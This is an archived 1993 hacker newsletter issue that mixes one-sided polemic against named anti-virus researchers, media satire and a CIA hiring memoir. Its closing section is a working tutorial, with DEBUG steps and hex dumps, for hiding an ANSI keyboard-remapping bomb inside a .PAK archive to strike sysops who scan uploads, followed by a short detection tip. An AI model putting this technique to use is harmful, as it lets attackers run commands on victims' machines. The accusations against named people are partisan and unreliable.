HPAVC

home *** CD-ROM | disk | FTP | other *** search

/ HPAVC / HPAVC CD-ROM.iso / pc / CRYPT17.ZIP / CRPTLT.R17 < prev next >

Wrap

Text File | 1993-08-14 | 55.7 KB | 1,243 lines

CRYPT NEWSLETTER 17 -=July-Aug 1993=- Edited by Urnst Kouch CRYPT INFOSYSTEMS BBS: 818-683-0854 INTERNET: ukouch@delphi.com, or 70743.1711@compuserve.com ------------------------------------ IN THIS ISSUE: MOLEHUNT - A wilderness of mirrors encountered while probing the events behind AIS . . . QUOTABLE QUOTES: A reporter's resource guide for hacker/computer virus news . . . Raoul Badger reports from the our east coast bureau in Naples, SC . . . Aristotle's Stupid ANSI-bomb Tricks . . . An interrupt vector lister from KohnTarK . . . YB-X virus: twisting code into a pretzel to foil heuristic analysis . . . much more. MOLEHUNT: THE COLD, SECRET WAR OF VIRUS HUNTERS [The following story continues with news surrounding the break-up of hacker information files on the US Bureau of Public Debt's Security Branch BBS. Because of the controversial nature of the files - system hacking software, tutorials and virus source code - The Bureau of Public Debt BBS became the target of a campaign of anonymous protest aimed at closing the system. Because of the controversy and whispering, mostly fueled by security worker Paul Ferguson, administrators at Public Debt demanded the files be removed from the system. Weeks later the events were splashed hysterically onto the front pages of the national news media which, unsurprisingly, got the story wrong. Spurred by this imbalance, the Crypt Newsletter, Computer underground Digest and others in the on-line community have slowly brought out the complexities of the issues, personalities and secret dealings behind the official news. This segment exposes some of the unethical behavior practiced by the Computer Antivirus Research Organization (CARO), a publicly sanctimonious self-selected group of professionals and pan-professionals with the purported aim of keeping the world safe from computer virus infection.] As the smoke clears from the ruins of the Bureau of Public Debt's Security Branch bulletin board system, the only thing to be seen is that, given their druthers, many anti-virus software developers and security experts are little different than caricatures of the venal computer thugs they'd like to persecute. Consider: according to sources at The Bureau of Public Debt, months prior to the campaign against the Public Debt system, Computer Antivirus Research Organization (CARO) member Joe Wells had attempted to enlist the aid of department security workers in targetting and harassing, with the final aim of shutting down - by whatever means necessary - a list of bulletin board systems suspected of storing computer viruses. The list, compiled by CARO, appeared, according to Public Debt sources, to name some organizations and systems with no connection to the computer underground or BBS's which trade in computer viruses. Security branch workers rebuffed Wells proposal as stupid and liable to result in legal retaliation. About the same time, CARO member Klaus Brunnstein of The University of Hamburg's (Germany) Virus Research Center threatened Public Debt's Security Branch with a press campaign if virus source code and hacker tools were not removed from its BBS. This nettled Security Branch workers, who knew that other CARO associates were helping themselves to the files in contention. What emerged was nothing less than a picture of CARO anti-virus software developers slithering out of some damp underground cave, wending their way between stalagmites like sightless, poison-skinned amphibians bent on petty schemes of overthrow aimed at rivals and selected, real or imagined, virus programming public enemies. In March, right on schedule, CARO member Alan Solomon lobbied publicly against the Public Debt BBS at an IEEE Computer Security conference in NYC. But in a grand stroke of cosmic irony, a member of the hacker/virus-programming group Phalcon/SKISM known as Timelord "trashed" an embarrassing CARO order-of-business memo written during an informal meeting at the same conference. Subsequently, the CARO memo was passed on to Black Axis virus exchange sysop John Buchanan who eventually sent it around the globe on the NUKE_THEWORLD FIDONet echo in July. The memo is unique in that it provides an inside look at the schizophrenic nature of CARO. Up for CARO membership, it reads, is virus exchange sysop John Buchanan. (He was later turned down.) It also admits a "leak" in the CARO virus collection (onto virus exchange bulletin board systems) necessitating some form of "tagging" of files so that sources can be traced. The memo also requests members to PUBLICLY disavow the existence of any such CARO virus collection. Most interesting is the recirculation of Joe Wells' "virus exchange" hit list idea. According to CARO, "it's mostly a US problem" which is to be addressed by setting up a "Murky Database" of virus exchange systems and their operators with the aim of galvanizing a police prosecution against those found criminal, but not against those innocent. It is worth noting that CARO, a self-selected professional/pan- professional organization with primarily FOREIGN leadership, isn't above trying to instigate police investigations against US citizens. This kind of secret campaigning by CARO-members travels from west to east, too. Recently, CARO member Glenn Jordan solicited the aid of virus exchange sysop John Buchanan in an attempt to discredit a European researcher applying for membership in CARO. Jordan wanted Buchanan, who has by turn been nominated for membership in CARO, turned down, and targeted for harassment by the organization for running a system which sells and trades viruses, to supply CARO with evidence that the researcher in question had purchased viruses from his bulletin board system. Buchanan, also known as Aristotle, refused to cooperate, showing more integrity than any of the mentioned CARO members. In retrospect, it becomes far less surprising that the Bureau of Public Debt's BBS manager, Kim Clancy, would wish to have as little to do as possible with any of a group of embarrasingly smelly fish. The remainder of the story has been extensively covered in Computer underground Digest and previous issues of The Crypt Newsletter. Acting under the encouragement of CARO- member Alan Solomon, security worker Paul Ferguson planted an anonymous letter of complaint in RISKS Digest 14.58 and later supported it with a piece under his own name. Bureaucrats at The Bureau of Public Debt, spooked by Ferguson's "anonymous" letter and the possibility of congressional inquiry, removed hacker tools and virus code from the system. Weeks later, the story broke in one-sided fashion at The Washington Post, with Paul Ferguson again able to carry himself off as a "whistle-blower" and independent, but concerned "expert." The official reality created was one of Kim Clancy and The Bureau of Public Debt smeared as "morally bankrupt," according to one spin-off news piece by columnist Wayne Rash in the specialty tabloid, Communications Week. This world of suspicion, charge and countercharge has been nothing if not a wilderness of mirrors, blinding and stupefying to those looking in from the cold, but clearly revealing the underhanded, sub rosa tactics of many anti-virus researchers to those with the patience to look deep into its reflecting surface. [Because of the sheer size of letters and related debate on this issue received by The Crypt Newsletter, we could not publish everything we might have liked. For further material, we point to recent issues of Computer underground Digest, or the archives at Crypt InfoSystems BBS (818-683-0854) which contain extensive collections of network electronic mail dealing with the Public Debt BBS news story.] QUOTABLE QUOTES: A JOURNALIST'S RESOURCE SHEET USEFUL IN ADDING PUNCH TO ANY STORY ON COMPUTER VIRUSES OR HACKERS. "The sleep of reason brings forth monsters." --Goya While researching topics of concern to anti-virus software industry workers and computer virus programmers, The Crypt Newsletter has managed to collect a great amount of potentially confusing text, a literary land-mine so to speak, just waiting to blow the foot off anyone blundering around unescorted in the field. As a public service, I've put together this list of "quotable quotes" and how and when to deploy them in stories on computer viruses and hackers. If you're a journalist or just some yahoo who needs to punch up a rant with superficially convincing expert testimony, feel free to use them, properly credited, of course. For the time when you need a good definition of the term "hacker": "Hackers are people analogous to drug addicts. They need their fix and cannot leave the machine alone. Like addicts they seek novelty and new experiences. Writing a virus gives them this, but unlike addicts who get immediate relief after a fix, they are not usually present when the virus triggers and releases its payload." --Jan Hruska, anti-virus software developer, in "Reefer Madness", oops - I mean, "Computer Viruses and Anti-Virus Warfare" For the time when you need a good definition of the term "freak" [sic]: "[Freaks are] an irresponsible subgroup of hackers, in the same way some drug addicts remain reasonably responsible (and use sterile needles), others (psychopaths) become irresponsible (and share needles). Freaks have serious social adjustment problems . . . unspecified grudges against society. They have no sense of responsibility or remorse about what they do . . . The mentality of the freak virus writer is not unlike that of a person who leaves a poisoned jar of baby food on a supermarket shelf. He delivers his poison, leaves and is untraced, and in his absence the victim falls." --Jan Hruska, same as above For when you need just the right touch of righteously indignant flatulence: " . . . it's been a while since the Treasury has openly helped lawbreakers ply their illicit trade." --columnist Wayne Rash, on the US Public Debt BBS, in - and I am not making this up - "Rash's Judgment", Communications Week, June 28, 1993 And, equally good: "The fact that the Treasury Department clearly has demonstrated the depths of its moral bankruptcy may not surprise those of us in [fill in your locale here], but it should cause concern in the country in general." --columnist Wayne Rash This next one is for when you want to scare someone with the evil genius of virus authors. "One such virus-mutation engine, called Dark Avenger [sic], and available in the darker corners of the electronic bulletin board universe, lets expert programmers create polymorphic viruses. --Peter Lewis, in his "Executive Computer" column in The NY Times, July 5, 1993 And this is for when you want to convince someone that it doesn't take an evil genius to make viruses. [Hint: Don't use it in the same story as the above, it will just confuse readers.] " . . . with this [virus code], relative amateurs could create new viruses, according to software writers." --reporter Joel Garreau in The Washington Post, June 20, 1993 This one is good for that human element "features section" writers are fond of. It has one anti-virus software developer taking a publicity op to blind-side a more successful competitor. "Just a couple of years ago, one anti-virus product developer created [demand for his product] at will with trumped-up and wildly exaggerated prognostications about what a new virus was going to do and when it was going to do it. Remember Michelangelo?" --Pam Kane, president of Panda Systems, quoted by Peter Lewis in his "Executive Computer" NY TIMES column [see above] And here's one by a guy totally unconnected to virus/anti-virus commercial interests, a truly "independent" expert, a writer of fiction. "There are all sorts of expensive programs nowadays for detecting and neutralizing viruses. And a whole lot of people thinking up ways to invent viruses that can't be got rid of. It's a whole industry. Lovely. I mean _rotten_." --Dick Francis, former jockey and wildly successful mystery novel author, in his recent work, "Driving Force" (Putnam). The last quote I leave you with is a real crusher. Including it as a snappy editorial capper will crown you king or result in vilification beyond belief, depending on the political slant of your peer group. "And if [bringing back moral and ethical backbone] fails, we can always re sort to our barbaric past -- 'If a child shows himself incorrigible, he should be decently and quietly beheaded at the age of twelve.' (Don Marquis, American journalist)" --National Computer Security Association News editorial, May/June 1993 RAOUL BADGER, MEDIA CRITIC, REPORTS FROM THE CRYPT NEWSLETTER'S EAST COAST BUREAU IN NAPLES, SC: So you've read Badger's reviews and come to the conclusion that he is a lonely, bitter misanthrope without prospects for a meaningful career or a decent Friday night date. Well, no comment. But in an effort to show that literacy in America is not a total waste, I'm compelled to examine an article by Scott Shepard, written for the Cox News Service. Mr. Shepard's article appeared in The State Newspaper (of Columbia, SC) under the title: "ROAD WITHOUT SIGNS: "Vision of information highway lacks design, rules for drivers" Mr. Shepard has done his research being less than impressed with the "Information Highway"! The best line in the piece is repeated five times: "12:00" "12:00" "12:00", a not-so-subtle way of reminding the reader of the millions of Americans who lack the know-how or will to master the skill of setting the time on their VCR. [Crypt Newsletter techno-hint: Place a rectangle of black electrical tape over the digits. That will fix it nicely.] Other highlights of this little gem: "The VCR jokes told by the experts and policy-makers reflect their unease about their 'Field of Dreams' gamble that, if you build it, users will come. "The good news is everyone in Congress supports the information superhighway . . . [t]he bad news is nobody in Congress understands what the information superhighway is." -the above is a quote from Rep. Ed Markey, chairman of the House Subcommittee on Telecommunications and Finance. And before you run off looking to shake his hand consider detractors rate Markey little more than a press hound, equally lacking of techno-savvy as his Congressional brethren. And, here's another: "... superlatives spawn skepticism, however, especially since neither the design of the information superhighway nor the rules of the road governing such basics as access, privacy and copyrights have been advanced. "Another basic issue -- who will pay for it -- hasn't been emphasized in the public debate. "....T.J. Rodgers, president of Cypress Semiconductor Corp., called the administration's proposal a handout and labeled the information superhighway 'the most recent example of industries lining up to feed at the public trough.'" "The potential for amazing advances in individual thought and creativity is very real, but so is the potential for oppression and mistrust, the likes of which we have never seen before..." -Emmanuel Goldstein, publisher of 2600 Magazine Simply amazing! A balanced, well researched article on the information highway that doesn't regurgitate Mitch Kapor's pablum. Maybe there is hope for journalism in America, after all! Ah, but the cynic thinks, maybe not. The July 19, 1993 issue of TIME has a full page story on "Heartbreak in Cyberspace." My, my, my. Seems that some Lothario used the WELL [the Whole Earth 'Lectronic Link] to develop ongoing relationships with a number of "babes" [sounds of local P.C. Bund members knocking on my door], oops, sorry, make that "women." Oh yes, Don Pardo-Lothario had one exchanging passionate phone sex for hours on end. He won another's complete trust. A third split the cost of an airline ticket so they could share a hot and steamy weekend. The rest of the story is stupidly obvious. Casanova-Don Pardo-Lothario dumps the cow after getting cream [sound of local P.C. Bund members breaking down my door], agghhh, make that "shows himself for the low-life scum he really is." Heartbroken b---, uh, woman commiserates with girlfriends and finds out she ain't the first. Women band together to spread the word on the fiend. This sparks "a network-wide debate on the spoken and unspoken rules of electronic etiquette," with all the standard recriminations and rationalizations. I can understand that TIME had space to burn, but don't the people on the WELL have anything better to do? Jeez, I can hear this kind of crap at any Xerox machine in any fair sized office in the country. Are there really people willing to spend two bucks an hour to hear it again? [Don't answer that. It's rhetorical.] And what about this stunning conclusion? "'I feel like an absolute fool,' says Lisa. 'People look at a computer and fail to realize that behind those words is a real person with feelings.' Welcome back to the real world." This is news? If Paul Fussel read it, he'd be rolling in a pool of his own sick. As long as there have been primates with swinging dic-- . . .[sounds of local P.C. Bund members strapping me into an electric chair] uh, there have been lying, cheating bastards willing to use any means necessary to achieve gratification. If you're a woman and don't know this, collar any guy and he'll admit it. Hell, we're even proud of it. If no men are handy, ask any woman. Most will agree. Since using a keyboard has not been shown to dramatically lower testosterone levels, why is any of this surprising? Oh well, Mr. Badger is signing off. There's 'babes' [sounds of local P.C. Bund members trying to execute me] at The WELL who need, heh-heh, "consolation and sympathy." IN RELATED NEWS: A THUMBNAIL SKETCH OF CONGRESSMAN ED MARKEY, U.S. POLICYMAKER FOR COMPUTERS AND TECHNOLOGY ISSUES In an August 1 news piece, The L.A. Times proclaimed Democrat Rep. Ed Markey, "The Man Who Is 'Plugged in' to How the Nation Communicates." Citizen Markey is of interest to newsletter readers because he sits in charge of the House Telecommunications and Finance subcommittee and has recently imposed himself on the issues of privacy and encryption, the 'information superhighway' and the public availability of virus source code and hacker tools on the US Bureau of Public Debt's Security Branch bulletin board system. The 47-year old, Massachusetts Congressman became a player in the Public Debt controversy only after reading about it in The Washington Post. He subsequently sent a letter of protest to Secretary of The Treasury Lloyd Bentsen (Public Debt is subsidiary to the Dept. of Treasury) which was republished in Computer underground Digest 5.57. In addition, Markey collaborated with the National Computer Security Association's recent Computer Virus Awareness Day confab in the nation's capitol and it seems certain he will be involved in a drive for new legislation against computer viruses and their trade which is expected to crest in the winter months of this year. However, according to The L.A. Times, the politician who would contribute to future policy on telecommunications, computer viruses and the "information superhighway" has an office with only a minimal set of the "high tech" tools he claims are part of the nation's future: a telephone, TV, videocassette player and fax machine. Hmmmm, no personal computer? In addition, in July 1988 Washingtonian magazine published a poll dubbing Markey the "No. 1 'Camera Hog' in Congress." Markey also acknowledged to The L.A. Times that he accepts contributions from leaders in the industry he's in charge of regulating. Political rivals call this improper and in 1990, consumer activist Ralph Nader went on record in The Boston Globe claiming, "[Markey is] getting on a first name basis with too many people in the industries he oversees, having too many dinners with them." Although lauded by Telecommunications and Finance subcommittee underling Rep. (Dem.) W. J. Tauzin of Louisiana who stated for The L.A. Times that, "Ed Markey has arrived" and courtier for the entertainment industry, Motion Picture Association of America president Jack Valenti, who said "[Markey is presiding] over a sea change in the way we communicate," Times business reporter Jube Shiver, Jr., did not document any Markey-inspired technology legislation which has been of benefit, directly or indirectly, to the average American. DELL COMPUTER SURVEY SHOWS AMERICANS PHOBIC AND BAFFLED BY DIGITAL ALARM CLOCKS, UNREADY TO DRIVE ON 'INFORMATION SUPERHIGHWAY' A Dell Computer survey of 1,000 adults and 500 teens across the country found a sizeable percentage mentally ill-prepared to assault the coming 'information superhighway.' Twenty-five percent of those surveyed said they would not use a computer unless it meant their job. Another quarter had never used a computer or even recorded a favorite TV show on a VCR. More results from the Dell poll: --Thirty-two percent of all adults were so cowed by computers they feared breaking the machines if allowed to use them unguided. Of these, 22 percent admitted fear at the prospect of setting digital alarm clocks. --Fifty-one percent of the adults also found computers and related technology baffling; 58 percent found the pace of technological advance confusing. Shhhhh. Loose lips sink ships! The Crypt Newsletter advises not sharing this data with any mainstream business and technology writers. They could become morose - perhaps even suicidal - at the mere thought of having to 'eighty-six' 50 percent of all new story ideas for the remainder of 1993. CRYPT NEWSLETTER FEATURE: HIRING PRACTICES AT THE CIA - NO BEDWETTERS ALLOWED [This story was originally published by Times-Mirror, Inc. in 1992, but we felt it's just the kind of thing newsletter readers would find fascinating. Republished with permission.] So you want to be a spy? And you're sure the place to go is the CIA! The CIA _is_ interested in hearing from you. It interviews thousands of Americans for jobs as spies, intelligence analysts and technical specialists every year. But because of its classified mission, hiring methods are unusual and Kafka-esque, taking at least a year to complete and bound in smothering bureacratic process, comic ineptitude and secrecy. Although the number of people employed by the CIA is classified, it regularly recruits on college campuses and through the job listings in major metropolitan newspapers. A recent series of advertisements aimed at minorities in magazines like Ebony drew spectacular media attention, but the typical CIA ad is bland and unassuming, easily blending in with countless other corporate calls for highly-trained, college- educated Americans. A year ago, one such ad ran in The Philadelphia Inquirer. Candidates were encouraged to resumes for consideration to a post office box drop in Pittsburgh, one of the agency's regional personnel clearinghouses. Candidates would be required to undergo a rigorous physical examination and polygraph test, the ad warned ominously. I forwarded my resume to the CIA mail drop, listing my qualifications as a scientist and journalist with the reasoning that these talents would be useful in analysis. Apparently, the CIA's personnel staff agreed. They got back to me in about a month and in so doing, begin a unique series of communications. Candidates, you see, are not contacted directly by the CIA. Instead they are delivered mail that requests them to contact an agency worker by telephone within a certain time frame. The contacts are often anonymous. For example, prospects whose last names began with "S" were asked to phone "Bobbi - Program Officer" at the CIA's Stafford Building in Tyson's Corner Center, VA. The initial interview with the CIA usually involves a type of cattle call. About a year ago, 30 of us met in a room at The Valley Forge Convention Center. There we underwent preliminary screening from a CIA team led by Pittsburgh-based representative Virginia Kraus. The team included workers from the agency's directorates of intelligence, operations and science and technology, including one agency employee who looked over my resume, saw that I worked at a newspaper and added that he had come to the agency as a newsman, too. It was the job of this spy and his colleagues to weed out potential crazies and issue to the remainder the agency's personnel Holy Grail, the 30-page Personal History Statement (PHS). The PHS is an inventory that scrutinizes all aspects of the job candidate's professional and private life. It becomes the basic curiculum vitae used during hiring and the template for the CIA's security team during its investigation of potential agents. "Don't leave anything blank," warned one of the spies balefully at the convention center. "I didn't think anyone would really sit down and go over the whole thing when I started, but believe me, they do." The PHS requires the spy-in-waiting to designate references in a number of categories, including family members, professional acquaintances and personal (not family) acquaintances who have lived in close proximity to the candidate for a year or two. "This is so the agency can call up your neighbors and ask them if there's loud music and blue smoke coming out of your front door on the weekends," Kraus cracked. The candidate is asked to document any record of criminal activity including theft, traffic violations, sexual deviance and perversion, unlawful drug use or undue publicity surrounding a divorce or civil suit. There is a battery of medical inquiries probing the candidate's injuries and hospital visits, mental stability, prescription and non-prescription drug use, gastro- intestinal health and nocturnal micturition frequency. The candidate is warned that the veracity of his statement is liable to be tested by polygraph. Accompanying submission of this dossier to the CIA are any collegiate transcripts and a long writing sample dealing with any topic of interest to intelligence workers. For example, writing about home grown pilot plants designed for the production of biological warfare agents in Third World countries is appropriate if you're applying for a job as an analyst. All candidates were warned not to inform anyone except close family members of their CIA screening. Kraus encouraged the use of a cover like "the government" or "Department of Defense" when notifying those who needed to be designated as references. A few months after submission of the personal statement and transcripts, the candidate is likely to get a phone call from CIA security who identifies himself only as a member of "the Agency." His job is to verify and embellish some of the information included in the PHS, specifically those sections dealing with criminal activity and homosexuality. In my case, the agent was particularly interested in a reference to recreational marijuana use in college. "How many cigarettes would you say you smoked?" he asked. Satisfied with the answer, the agent continued by inquiring about drinking. "The Agency's position in these matters is one of abstention enforced by testing," he said. That concluded the interrogation. "You have a nice day," said the spy before hanging up. Most of this preliminary screening is in response to much publicized problems the CIA has had in the past with the penetration by the criminal or mentally ill. James Jesus Angleton, the feared head of the CIA's counterintelligence wing and one of the most powerful men in the agency during the height of The Cold War, left his office in disgrace, having acquired a reputation, documented by journalists Thomas Mangold and Seymour Hersh, as a paranoid alcoholic and pathological liar. If the prospective employee's personal statement and transcripts survive the initial evaluation, he or she is given a series of aptitude and psychological tests. Those in eastern Pennsylvania were again contacted and issued a ticket/summons for the tests, which were administered one summer Saturday morning in the physics building at the University of Pennsylvania in Philadelphia. The testing at Penn, an all-day affair, included a series of vocabulary, simple math, reading comprehension and abstract thought multiple-choice quizzes, similar to a college aptitude test. Also included was the California Psychological Inventory, devised by Dr. Harrison Gough, psychologist. Our copy, which had a copyright date of 1956, asked for true/false responses to a number of statements, including: 1) I have gotten myself into trouble because of my involvement in unseemly sexual activities. 2) In high school I was often sent to the principal's office for "cutting up." 3) I sweat in even the coolest weather. 4) I believe it is every citizen's duty, as part of the community, to keep his sidewalk and lawn neat and clean. 5) I must admit, I think people are fools who don't think the American way is the best there is. 6) I often think people are watching me. 7) I like tall women. 8) I must admit, I don't mind being the "cut-up" at the office party. One can only wonder what the two women who took the psychological inventory that Saturday answered to question No. 7. It seemed curious that the agency was using a test from 1956 -- when presumably very few women applied for jobs in intelligence and when being a "cut-up" in high school was one of the worst things you could be accused of - to screen young professionals in 1991. Two other tests included a work environment survey and a current world events test, both tailored for the CIA. For example, the work environment survey asked whether the candidates would accept a job in a foreign culture or where conditions of extreme physical hazard (presumably a war zone), unpalatable food, no sanitation or debilitating disease prevail. It also focused on whether candidates would be willing to work anonymously and without recognition for long periods of time for people they find personally repugnant. The hardest test was the current world events quiz. It presumed a comprehensive knowledge of world politics and personalities that might only be gained from religious study of The Washington Post or a background in international relations. After the testing, a couple more months passed. Candidates were then informed by mail whether they had been bound over for interview at CIA headquarters in McLean, VA. During this 9-month long period, no one from the agency had spoken to me for more than five minutes. Finally, another letter arrived. It included an appointment date with "Agency Officials" interested in discussing possible employment. The interview was set for the week after Thanksgiving in the Directorate of Intelligence's Office of East Asian Analysis. "Ellie" was my contact. A room was reserved for the night before at The Days Inn in Vienna, VA. It was a 15-minute drive to the CIA the next morning. The unmarked compound is not far from Langley High School. You can tell you are there by the barricades of concrete and obstacle-wire surround the wooded campus. The entrance block-house guard was supposed to check my photo driver's license, but he handed it back and waved me through without taking a look. The Directorate of Intelligence is a moden looking edifice of cement and green glass. At the entrance were a score of smokers bearing the same furtive, hounded look seen at other corporations where smoking within the building has been banned. Just inside was a marble hallway containing a likeness of William Casey. Getting to the Office of East Asian Analysis entails a check-in at reception, where I presented my papers. After a few minutes, "Ellie," a middle-aged woman showed up to escort me. I was issued a green piece of paper and a pass card used to get through an electronic Pinkerton security turnstile. A security man gave my briefcase the once-over. Overhead was a sign stating that passage beyone the portal conferred agreement to a search of your person, your belongings and your car at any time. The agency has been sensitive to accusations that it's possible to walk out of the building with highly classified materials ever since 1978, when William Kampiles walked off CIA grounds with technical manuals for the super-secret National Reconnaissance Office's KH-11 spy satellite. Kampiles, a junior clerk, was sentenced to 40 years in jail for selling the manual to the Soviets. During the same period, 16 other KH-11 manuals disappeared and were never traced. While I was coming in, many were coming out. No bags were checked. Later, when I left, no one asked about my briefcase. Upstairs in the Office of East Asian Analysis, National Geographic-like photos of China adorned the walls. Documents marked "SECRET" littered the desks. Sadie Brown-Fields, a personnel administrator for the office was holding court. In her office, I asked her if the recession had affected hiring. It had, she said. "I don't like the word 'down-sizing'," she said with a glassy smile. "We call it 'right-sizing.'" Fields said she couldn't say whether the agency's "right- sizing" involves cuts in 60 percent of prospective hires, as had been recently reported in national newspapers. But then she changed her mind and commented, "That's a little high." This has created problems for the agency, she said. Since attrition isn't removing veterans at the expected rate, it's been difficult to bring in new people she added. Complicating matters is the polygraph and security check. "Eighty to 90 percent of the people to which the agency makes an offer fail it." As for where I fit into things, interest was from the China Division: Industry & Technology branch of the office. "The section head's not here today," said Fields. "But Ken Sawka will speak with you." Ken Sawka turned out to be an airy, blond-haired analyst with a master's degree in international relations from American University. I thought Ken had what is known as a paper rectum, a demeaning but accurate descriptive which used to be in fashion. "What did you say your name was?" he asked as we walked down the hall to his boss's empty office. Sawka didn't have my resume, my PHS or any information on my scientific background, the reason I was being interviewed, so he didn't ask any questions, preferring instead to talk about himself. How many scientists are currently working in the office, I finally asked. "None," Sawka said. "That's why we're trying to look at some." The agency, Sawka said, made up for this lack by sending analysts to seminars on topics the various departments may have to deal with, such as ballistic missile technology. Sawka added he was glad he had finally learned what an accelerometer was and how integral design is to ballistic missile development. I asked Sawka about the polygraph screening and nature of the psychological testing. He laughed nervously but said, "Everybody has to go through it and it's not any fun. But security believes very strongly in it and the agency works hard to get candidates through the lie-detector. We allow them to take it three times." At the end of the interview, Fields asked me to take some "stuff" over the Stafford Building for her when I went there to collect travel expenses. A moment later she thought better of it, but supplied me with directions anyway. Outside the Stafford Building later in the day were more harried smokers. Inside I asked for gas money ($20) and mileage. A CIA worker insisted that this be compared against the price of the lowest airline ticket from Philadelphia. I argued that this was ridiculous, to no avail. As predicted, a telephone call to a CIA airline-ticket specialist came up with a figure far in excess of the gas money. The agent then gave me a little more than $200 of the taxpayer's money, a generous per diem, and mileage allowance. The hotel room had been paid in advance. A call to Field's office a few days later elicited the information that in East Asian Analysis, there were no job openings and no hiring plans. When I asked why, in that case, the testing and interviewing, no one had an answer except to say "the agency has to plan for every contingency." ARISTOTLE'S STUPID ANSI BOMB TRICKS or DON'T UNPAK THAT PAK!!! The latest craze to hit the virus scene is the use of the old ANSI bomb in PAKed CON file. Perfected in the Ukraine by an ancient soothe sayer of soothe that needeth saying, this tiny non-conformity packs a whallop! Just ask the folks at McAfee's who alledgedly took a nukeage from one. Why all the hub-bub about them? Well, I'll tell ya! It seems that the redirected keyboard trick still works when deployed from the CON device into a target rich environment. Unwary sysops who utilize the new comforts of auto-scanning their uploads are learning that the risk of a serious nukeage still exists. So that you may better understand how this function works, I have laid out a little example; Make and ANSI bomb with the TJA-ANSI bomb creator from RABiD. (Hopefully, Dr. Kouch included it in this issue of the CRyPT NEWLETTER... If not, BITCH!) I have included the displays so you will be able to have a full explanation of what is going on. (Trust me! If you can't follow this program *WITHOUT* the following eaxmples, you don't need to be using a computer in the first place. ──────────────────────────────────────────────────────────── ════════════════════════════════════════════════════════════ THE ANSI BOMB GENERATOR 1.03ß (C)1990 by The Jolly Anarchist ════════════════════════════════════════════════════════════ MAIN MENU ═════════ [A] Create An Ansi Bomb [B] Add A Bomb To A File [C] Information/Help [D] Exit to DOS Your Choice? ──────────────────────────────────────────────────────────── Obviously, you want to create the thing at this point :) So choose "A" Simply pressin the <Space Bar> will insert the desired key that you wish to redefine... ──────────────────────────────────────────────────────────── Enter Key to Re-Define : 32 Please Re-Enter the Key : 32 Continue? ──────────────────────────────────────────────────────────── Once you've chosen your key, the next thing you will need to do is name the program you want executed when the bomb goes off. ──────────────────────────────────────────────────────────── Enter Your Sequence Below. You may not backspace, so GET IT RIGHT! Type: '/S' to save, '/A' to abort, '/R' to Restart, '?' for help ═══════════════════════════════════════════════════════════════════ DIR Save Sequence? ──────────────────────────────────────────────────────────── Of course you save the silly thing! Follow the remaining prompts and use that growth on your shoulders to answer the prompts. ──────────────────────────────────────────────────────────── {--------} Enter a Name for this Bomb: TEST {--------------------------------} Enter a Description for this bomb: EXAMPLE FOR CRyPT ──────────────────────────────────────────────────────────── Aside from the free plug for the CRyPT Newsletter, the only remaining thing to do in this program is to add the bomb to an ANSI file, or simply leave it as it is and let the program create one for you. ──────────────────────────────────────────────────────────── File to Add Bomb to: LOGO.ANS Bombs Available : TEST {--------} Bomb to add: TEST ──────────────────────────────────────────────────────────── Next you'll see... ──────────────────────────────────────────────────────────── Add Bomb to then [B]eginning or the [E]nd of the file? ──────────────────────────────────────────────────────────── I have found that if you add this little critter to the end of the file, the entire ANSI will display whereas at the beginning of the file, the ANSI may never appear. Anyhow, you now have a file named TEST or LOGO.ANS that contains the strings for an ANSI bomb that look something like this; 68;73;82;13p The way it reads is, SPACEBAR is redefined to 13p <RETURN> So, what it will do is type ;68="D", ;73="I", ;82="R". (That's DIR, for the mentally impaired) It can be anything, but for this example and to be non-destructive, we'll use DIR. When the unsuspecting SySop opens the file and the contents of the CON file inside the .PAK file are expanded, the trigger is set. A simple touch to the spacebar will yield nasty results. Here though, you'll only see your smutty .GIF collection jump up at you. Questions that will arise... Er, uh! Gee, Mr. ARiSToTLE, How do I get the ANSI bomb inside the .PAK file??? Well, I'll tell ya! Take your little creation and rename it to "YON" with no extension. At the command line, create a .PAK file by typing PAK A TEST YON You will immediately see Mr. PAK sucking up the file... Once it is all sucked up inside, this is where it gets fun! Again, at the command line, type; DEBUG TEST.PAK You will see a single "-" waiting for some input. Type; D 0100 This will list the first chunk of code in TEST.PAK and depending on the version you have, you should see something like this; - 2EC7:0100 1A 02 59 4F 4E 00 46 72-11 00 00 00 14 15 13 11 ..YON.Fr........ 2EC7:0110 00 00 00 EE 1A 59 7C 39-22 11 00 00 00 1B 5B 33 .....Y|9".....[3 2EC7:0120 32 3B 36 38 3B 37 33 3B-38 32 3B 31 33 70 1A 00 2;68;73;82;13p.. 2EC7:0130 FE 02 01 00 00 00 00 00-FE 00 1E B8 B9 1E 50 FF ..............P. 2EC7:0140 36 98 1C E8 DD BC E8 8E-BD 98 89 C6 E8 AF FC 85 6............... 2EC7:0150 F6 74 0A C6 06 D9 22 01-B8 01 00 EB 02 31 C0 5E .t...."......1.^ 2EC7:0160 C3 31 C0 50 31 C0 50 31-C0 50 E8 3A BE 3C 00 74 .1.P1.P1.P.:.<.t 2EC7:0170 AD E8 82 BB EB A3 56 A1-CE 1C 3B 06 98 1C 7E 04 ......V...;...~. - In the first line, you see where it says YON.Fr? I sure hope so or I'm spinning my wheels here... Now you will type; E 0102 'C' W Q Reason being, the 'Y' occupies that location and you want to replace the 'Y', with a 'C', so that it spells 'CON". 'W' will tell DEBUG to write it. 'Q' will take you back to DOS. Ah gee, Mr. Wizard... It changed!!! - 2EC7:0100 1A 02 43 4F 4E 00 46 72-11 00 00 00 14 15 13 11 ..CON.Fr........ 2EC7:0110 00 00 00 EE 1A 59 7C 39-22 11 00 00 00 1B 5B 33 .....Y|9".....[3 2EC7:0120 32 3B 36 38 3B 37 33 3B-38 32 3B 31 33 70 1A 00 2;68;73;82;13p.. 2EC7:0130 FE 02 01 00 00 00 00 00-FE 00 1E B8 B9 1E 50 FF ..............P. 2EC7:0140 36 98 1C E8 DD BC E8 8E-BD 98 89 C6 E8 AF FC 85 6............... 2EC7:0150 F6 74 0A C6 06 D9 22 01-B8 01 00 EB 02 31 C0 5E .t...."......1.^ 2EC7:0160 C3 31 C0 50 31 C0 50 31-C0 50 E8 3A BE 3C 00 74 .1.P1.P1.P.:.<.t 2EC7:0170 AD E8 82 BB EB A3 56 A1-CE 1C 3B 06 98 1C 7E 04 ......V...;...~. - Well, that's about it! Easy as falling off a log, eh?... *REMEMBER* to PAK up the executable you wish to have executed or all this information will have been for naught! Ah, you know I can't leave it like this . . . Let me give you a quick run down on how to prevent this from happening to you . . . Simply use the HEX codes that are representive of; ;13p and insert them into F-PROT's user defined area. Then scan your .PAKs, .TXTs, and anything else that can be typed . . . Till next time, -----ARiSToTLE [In related news, the PAK-bomb described above has been attributed to a wave 